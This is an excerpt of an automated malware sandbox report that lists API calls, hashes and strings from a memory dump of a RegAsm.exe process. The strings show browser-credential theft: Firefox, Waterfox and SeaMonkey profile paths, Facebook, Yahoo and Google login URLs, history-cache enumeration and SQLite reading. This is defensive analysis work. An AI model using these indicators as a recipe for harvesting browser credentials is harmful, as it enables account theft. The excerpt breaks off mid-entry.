                          • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                          • memset.MSVCRT ref: 0040E1BD
                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                          • free.MSVCRT ref: 0040E28B
                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                          • _snwprintf.MSVCRT ref: 0040E257
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                          • API String ID: 2804212203-2982631422
                          • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                          • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                            • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                          • memset.MSVCRT ref: 0040BC75
                          • memset.MSVCRT ref: 0040BC8C
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                          • memcmp.MSVCRT ref: 0040BCD6
                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                          • String ID:
                          • API String ID: 115830560-3916222277
                          • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                          • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                          • String ID: r!A
                          • API String ID: 2791114272-628097481
                          • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                          • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                          • _wcslwr.MSVCRT ref: 0040C817
                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                          • wcslen.MSVCRT ref: 0040C82C
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                          • API String ID: 2936932814-4196376884
                          • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                          • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                          Control-flow Graph

                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                          • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                          • String ID: BIN
                          • API String ID: 1668488027-1015027815
                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 00403CBF
                          • memset.MSVCRT ref: 00403CD4
                          • memset.MSVCRT ref: 00403CE9
                          • memset.MSVCRT ref: 00403CFE
                          • memset.MSVCRT ref: 00403D13
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 00403DDA
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Waterfox$Waterfox\Profiles
                          • API String ID: 4039892925-11920434
                          • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                          • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                          • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                          • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 00403E50
                          • memset.MSVCRT ref: 00403E65
                          • memset.MSVCRT ref: 00403E7A
                          • memset.MSVCRT ref: 00403E8F
                          • memset.MSVCRT ref: 00403EA4
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 00403F6B
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                          • API String ID: 4039892925-2068335096
                          • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                          • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                          • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                          APIs
                          • memset.MSVCRT ref: 00403FE1
                          • memset.MSVCRT ref: 00403FF6
                          • memset.MSVCRT ref: 0040400B
                          • memset.MSVCRT ref: 00404020
                          • memset.MSVCRT ref: 00404035
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                          • memset.MSVCRT ref: 004040FC
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                          • API String ID: 4039892925-3369679110
                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                          APIs
                          • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                          • API String ID: 3510742995-2641926074
                          • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                          • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                          APIs
                          • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                          • GetLastError.KERNEL32 ref: 0041847E
                          • free.MSVCRT ref: 0041848B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CreateErrorFileLastfree
                          • String ID: |A
                          • API String ID: 981974120-1717621600
                          • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                          • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                          APIs
                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                          • memset.MSVCRT ref: 004033B7
                          • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                          • wcscmp.MSVCRT ref: 004033FC
                          • _wcsicmp.MSVCRT ref: 00403439
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                          • String ID: $0.@
                          • API String ID: 2758756878-1896041820
                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                          APIs
                          • memset.MSVCRT ref: 00403C09
                          • memset.MSVCRT ref: 00403C1E
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                          • wcscat.MSVCRT ref: 00403C47
                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                          • wcscat.MSVCRT ref: 00403C70
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                          • API String ID: 1534475566-1174173950
                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 669240632-0
                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                          APIs
                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                          • memset.MSVCRT ref: 00414C87
                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                          • wcscpy.MSVCRT ref: 00414CFC
                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                          Strings
                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                          • API String ID: 2925649097-2036018995
                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                          APIs
                          • wcschr.MSVCRT ref: 00414458
                          • _snwprintf.MSVCRT ref: 0041447D
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                          • String ID: "%s"
                          • API String ID: 1343145685-3297466227
                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                          APIs
                          • memset.MSVCRT ref: 004087D6
                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                          • memset.MSVCRT ref: 00408828
                          • memset.MSVCRT ref: 00408840
                          • memset.MSVCRT ref: 00408858
                          • memset.MSVCRT ref: 00408870
                          • memset.MSVCRT ref: 00408888
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                          • String ID:
                          • API String ID: 2911713577-0
                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcmp
                          • String ID: @ $SQLite format 3
                          • API String ID: 1475443563-3708268960
                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _wcsicmpqsort
                          • String ID: /nosort$/sort
                          • API String ID: 1579243037-1578091866
                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                          APIs
                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                          • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModuleProcessTimes
                          • String ID: GetProcessTimes$kernel32.dll
                          • API String ID: 116129598-3385500049
                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                          APIs
                          • memset.MSVCRT ref: 0040E60F
                          • memset.MSVCRT ref: 0040E629
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
